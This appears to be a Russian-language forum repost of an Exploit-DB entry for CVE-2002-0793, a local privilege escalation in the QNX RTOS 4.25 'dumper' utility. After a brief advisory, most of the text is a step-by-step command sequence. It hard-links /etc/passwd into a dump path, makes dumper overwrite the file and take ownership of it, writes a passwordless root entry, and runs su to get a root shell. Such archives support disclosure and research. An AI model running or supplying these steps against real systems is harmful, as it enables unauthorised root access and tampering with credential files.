Exploit QNX RTOS 4.25 - dumper Arbitrary File Modification

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21501
Проверка EDB
  1. Пройдено
Автор
SIMON OUELLETTE
Тип уязвимости
LOCAL
Платформа
LINUX
CVE
cve-2002-0793
Дата публикации
2002-05-31
Код:
source: https://www.securityfocus.com/bid/4904/info

When creating memory dump files, the QNX RTOS debugging utility 'dumper' follows symbolic links. It also sets ownership of the file to the userid of the terminated process. It is possible for malicious local attackers to exploit this vulnerability to overwrite and gain ownership of arbitrary files. Consequently, attackers may elevate to root privileges by modifying files such as '/etc/passwd'. 

Example exploit, with /bin/dumper:

Let EVIL be the unprivileged user who wants to gain root access.

#link to the passwd file: dumper dumps to [process name].dmp
$ ln /etc/passwd /home/EVIL/ksh.dmp
#call the program that will attempt to write to the hard link
$ dumper -d /home/EVIL -p [PID of EVIL's ksh]
#have dumper do its job by terminating the monitored process
$ exit
#at this point, /etc/passwd is overwritten by the binary dump, and more
importantly: EVIL is now the owner !
$ echo root::0:0::///:/bin/sh > /etc/passwd
#but now no login works because /etc/passwd is not owned by userid 0. #So
you do:

$ passwd

#and change your password. This gives /etc/passwd ownership back to root,
keeping the modifications you have made.

$ su
#
 
Источник
www.exploit-db.com

Похожие темы